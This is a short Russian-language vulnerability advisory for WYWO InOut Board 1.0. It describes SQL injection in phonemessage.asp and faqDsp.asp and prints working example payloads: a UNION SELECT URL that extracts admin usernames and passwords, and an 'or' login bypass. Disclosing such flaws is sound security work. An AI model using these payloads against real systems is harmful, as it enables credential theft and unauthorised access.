Программа: WYWO - InOut Board 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "num" сценарием phonemessage.asp и в параметре "catcode" сценарием faqDsp.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения и обойти механизм аутентификации.
Пример:
SQL-инъекция:
http://[target]/[path/phonemessage.asp?num=[SQL]
//phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
Обход механизма аутентификации:
http://[target]/[path]//faqDsp.asp?catcode=[SQL]
//login.asp Username: 'or' Password: 'or'